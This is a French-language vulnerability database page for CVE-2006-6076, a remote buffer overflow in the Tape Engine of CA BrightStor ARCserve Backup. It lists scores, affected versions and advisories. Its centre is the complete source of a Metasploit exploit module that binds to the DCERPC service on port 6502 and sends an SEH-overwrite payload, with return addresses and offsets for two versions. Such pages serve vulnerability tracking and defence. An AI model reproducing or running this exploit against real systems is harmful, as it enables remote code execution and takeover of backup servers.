CVE-2006-6076 : Détail

CVE-2006-6076

80.76%V3
Network
2006-11-24
16h00 +00:00
2018-10-17
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the Tape Engine (tapeeng.exe) in CA (formerly Computer Associates) BrightStor ARCserve Backup 11.5 and earlier allows remote attackers to execute arbitrary code via certain RPC requests to TCP port 6502.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16407

Date de publication : 2010-05-08 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: tape_engine.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'CA BrightStor ARCserve Tape Engine Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'MC', 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2006-6076' ], [ 'OSVDB', '30637' ], [ 'BID', '21221' ], [ 'URL', 'http://www.milw0rm.com/exploits/3086' ], [ 'URL', 'http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'StackAdjustment' => -9500, }, 'Platform' => 'win', 'Targets' => [ [ 'BrightStor ARCserve r11.1', { 'Ret' => 0x2380cdc7, 'Offset' => 1158 } ], #p/p/r cheyprod.dll 07/21/2004 [ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5, 'Offset' => 1132 } ], #p/p/r cheyprod.dll ??/??/???? ], 'DisclosureDate' => 'Nov 21 2006', 'DefaultTarget' => 1)) register_options([ Opt::RPORT(6502) ], self.class) end def exploit connect handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") request = "\x00\x04\x08\x0c\x02\x00\x00\x00\x00\x00" request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" dcerpc.call(43, request) filler = "\x10\x09\xf9\x77" + rand_text_english(target['Offset']) seh = generate_seh_payload(target.ret) sploit = filler + seh print_status("Trying target #{target.name}...") begin dcerpc_call(38, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse end handler disconnect end end

Products Mentioned

Configuraton 0

Broadcom>>Brightstor_arcserve_backup >> Version To (including) 11.5

Broadcom>>Brightstor_arcserve_backup >> Version 11.1

Broadcom>>Brightstor_arcserve_backup >> Version 11.5

Ca>>Brightstor_arcserve_backup >> Version 11

    Ca>>Brightstor_arcserve_backup >> Version 11.1

      Ca>>Brightstor_arcserve_backup_agent >> Version 11.0

        Ca>>Brightstor_arcserve_backup_agent >> Version 11.1

          Références

          http://www.securityfocus.com/bid/21221
          Tags : vdb-entry, x_refsource_BID
          http://secunia.com/advisories/24512
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.securityfocus.com/archive/1/456711
          Tags : mailing-list, x_refsource_BUGTRAQ
          http://securitytracker.com/id?1017268
          Tags : vdb-entry, x_refsource_SECTRACK
          http://secunia.com/advisories/23060
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://www.vupen.com/english/advisories/2006/4654
          Tags : vdb-entry, x_refsource_VUPEN
          http://www.kb.cert.org/vuls/id/437300
          Tags : third-party-advisory, x_refsource_CERT-VN